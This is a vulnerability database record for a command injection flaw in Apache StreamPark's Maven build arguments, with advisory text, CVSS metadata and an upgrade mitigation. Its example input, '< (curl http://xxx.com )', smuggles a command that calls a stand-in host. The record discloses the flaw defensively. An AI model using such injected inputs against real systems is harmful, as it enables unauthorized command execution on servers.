CVE-2023-52291 (GCVE-0-2023-52291)
Vulnerability from cvelistv5 – Published: 2024-07-17 08:16 – Updated: 2025-02-13 17:20
VLAI?
Title
Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution
Summary
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Background:
In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection,
Mitigation:
all users should upgrade to 2.1.4, The "<" operator will blocked。
Severity ?
No CVSS data available.
CWE
- CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark (incubating) |
Affected:
2.0.0 , < 2.1.4
(semver)
|
Credits
thiscodecc of MoyunSec Vlab and Bing
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "streampark",
"vendor": "apache",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52291",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-22T15:31:24.527843Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-22T15:31:31.956Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:55:41.676Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark (incubating)",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "thiscodecc of MoyunSec Vlab and Bing"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "In streampark, the project module integrates Maven\u0027s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\u003cbr\u003e\u003cdiv\u003e\u003cbr\u003e\u003cbr\u003eBackground:\u003cbr\u003e\u003cbr\u003eIn the \"Project\" module, the maven build args\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u0026nbsp;\u201c\u0026lt;\u201d operator causes command injection. e.g\u003c/span\u003e : \u201c\u0026lt; (curl\u0026nbsp;\u003ca target=\"_blank\" rel=\"nofollow\" href=\"http://xxx.com\"\u003ehttp://xxx.com\u003c/a\u003e)\u201d will be executed as a command injection,\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cdiv\u003eMitigation:\u003cbr\u003e\u003cbr\u003e\u003c/div\u003eall users \u003cspan style=\"background-color: var(--wht);\"\u003eshould upgrade to 2.1.4,\u0026nbsp; The \"\u0026lt;\" operator will blocked\u3002\u003c/span\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003c/div\u003e\u003cp\u003e\u003c/p\u003e\u003cbr\u003e\u003cbr\u003e"
}
],
"value": "In streampark, the project module integrates Maven\u0027s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nBackground:\n\nIn the \"Project\" module, the maven build args\u00a0\u00a0\u201c\u003c\u201d operator causes command injection. e.g : \u201c\u003c (curl\u00a0 http://xxx.com )\u201d will be executed as a command injection,\n\nMitigation:\n\nall users should upgrade to 2.1.4,\u00a0 The \"\u003c\" operator will blocked\u3002"
}
],
"metrics": [
{
"other": {
"content": {
"text": "low"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-77",
"description": "CWE-77 Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-17T08:20:06.344Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/1"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2023-52291",
"datePublished": "2024-07-17T08:16:12.520Z",
"dateReserved": "2023-12-31T08:48:16.192Z",
"dateUpdated": "2025-02-13T17:20:01.487Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2023-52291\",\"sourceIdentifier\":\"security@apache.org\",\"published\":\"2024-07-17T09:15:02.410\",\"lastModified\":\"2025-02-13T18:15:54.277\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"In streampark, the project module integrates Maven\u0027s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\\n\\nBackground:\\n\\nIn the \\\"Project\\\" module, the maven build args\u00a0\u00a0\u201c\u003c\u201d operator causes command injection. e.g : \u201c\u003c (curl\u00a0 http://xxx.com )\u201d will be executed as a command injection,\\n\\nMitigation:\\n\\nall users should upgrade to 2.1.4,\u00a0 The \\\"\u003c\\\" operator will blocked\u3002\"},{\"lang\":\"es\",\"value\":\"En Streampark, el m\u00f3dulo del proyecto integra las capacidades de compilaci\u00f3n de Maven. La validaci\u00f3n de los par\u00e1metros de entrada no es estricta, lo que permite a los atacantes insertar comandos para la ejecuci\u00f3n remota de comandos. El requisito previo para un ataque exitoso es que el usuario debe iniciar sesi\u00f3n en el sistema Streampark y tener permisos a nivel de sistema. Generalmente, s\u00f3lo los usuarios de ese sistema tienen autorizaci\u00f3n para iniciar sesi\u00f3n y los usuarios no ingresar\u00edan manualmente un comando de operaci\u00f3n peligroso. Por tanto, el nivel de riesgo de esta vulnerabilidad es muy bajo. Antecedentes: en el m\u00f3dulo \\\"Proyecto\\\", el operador maven build args \u201c\u0026lt;\u201d provoca la inyecci\u00f3n de comandos. Por ejemplo: \u201c\u0026lt; (curl http://xxx.com)\u201d se ejecutar\u00e1 como una inyecci\u00f3n de comando. Mitigaci\u00f3n: todos los usuarios deben actualizar a 2.1.4. El operador \\\"\u0026lt;\\\" se bloquear\u00e1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L\",\"baseScore\":4.7,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":1.2,\"impactScore\":3.4},{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security@apache.org\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-77\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.0.0\",\"versionEndExcluding\":\"2.1.4\",\"matchCriteriaId\":\"EA1D77DB-B854-44DA-9749-A3F326BD4D06\"}]}]}],\"references\":[{\"url\":\"http://www.openwall.com/lists/oss-security/2024/07/17/1\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\"]},{\"url\":\"https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2024/07/17/1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\"]},{\"url\":\"https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf\", \"tags\": [\"vendor-advisory\", \"x_transferred\"]}, {\"url\": \"http://www.openwall.com/lists/oss-security/2024/07/17/1\", \"tags\": [\"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T22:55:41.676Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}, {\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-52291\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-07-22T15:31:24.527843Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*\"], \"vendor\": \"apache\", \"product\": \"streampark\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.0.0\", \"lessThan\": \"2.1.4\", \"versionType\": \"semver\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-07-18T15:15:26.480Z\"}}], \"cna\": {\"title\": \"Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"thiscodecc of MoyunSec Vlab and Bing\"}], \"metrics\": [{\"other\": {\"type\": \"Textual description of severity\", \"content\": {\"text\": \"low\"}}}], \"affected\": [{\"vendor\": \"Apache Software Foundation\", \"product\": \"Apache StreamPark (incubating)\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.0.0\", \"lessThan\": \"2.1.4\", \"versionType\": \"semver\"}], \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf\", \"tags\": [\"vendor-advisory\"]}, {\"url\": \"http://www.openwall.com/lists/oss-security/2024/07/17/1\"}], \"x_generator\": {\"engine\": \"Vulnogram 0.1.0-dev\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"In streampark, the project module integrates Maven\u0027s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\\n\\nBackground:\\n\\nIn the \\\"Project\\\" module, the maven build args\\u00a0\\u00a0\\u201c\u003c\\u201d operator causes command injection. e.g : \\u201c\u003c (curl\\u00a0 http://xxx.com )\\u201d will be executed as a command injection,\\n\\nMitigation:\\n\\nall users should upgrade to 2.1.4,\\u00a0 The \\\"\u003c\\\" operator will blocked\\u3002\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"In streampark, the project module integrates Maven\u0027s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\u003cbr\u003e\u003cdiv\u003e\u003cbr\u003e\u003cbr\u003eBackground:\u003cbr\u003e\u003cbr\u003eIn the \\\"Project\\\" module, the maven build args\u0026nbsp;\u003cspan style=\\\"background-color: rgb(255, 255, 255);\\\"\u003e\u0026nbsp;\\u201c\u0026lt;\\u201d operator causes command injection. e.g\u003c/span\u003e : \\u201c\u0026lt; (curl\u0026nbsp;\u003ca target=\\\"_blank\\\" rel=\\\"nofollow\\\" href=\\\"http://xxx.com\\\"\u003ehttp://xxx.com\u003c/a\u003e)\\u201d will be executed as a command injection,\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cdiv\u003eMitigation:\u003cbr\u003e\u003cbr\u003e\u003c/div\u003eall users \u003cspan style=\\\"background-color: var(--wht);\\\"\u003eshould upgrade to 2.1.4,\u0026nbsp; The \\\"\u0026lt;\\\" operator will blocked\\u3002\u003c/span\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003c/div\u003e\u003cp\u003e\u003c/p\u003e\u003cbr\u003e\u003cbr\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-77\", \"description\": \"CWE-77 Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"f0158376-9dc2-43b6-827c-5f631a4d8d09\", \"shortName\": \"apache\", \"dateUpdated\": \"2024-07-17T08:20:06.344Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2023-52291\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-13T17:20:01.487Z\", \"dateReserved\": \"2023-12-31T08:48:16.192Z\", \"assignerOrgId\": \"f0158376-9dc2-43b6-827c-5f631a4d8d09\", \"datePublished\": \"2024-07-17T08:16:12.520Z\", \"assignerShortName\": \"apache\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…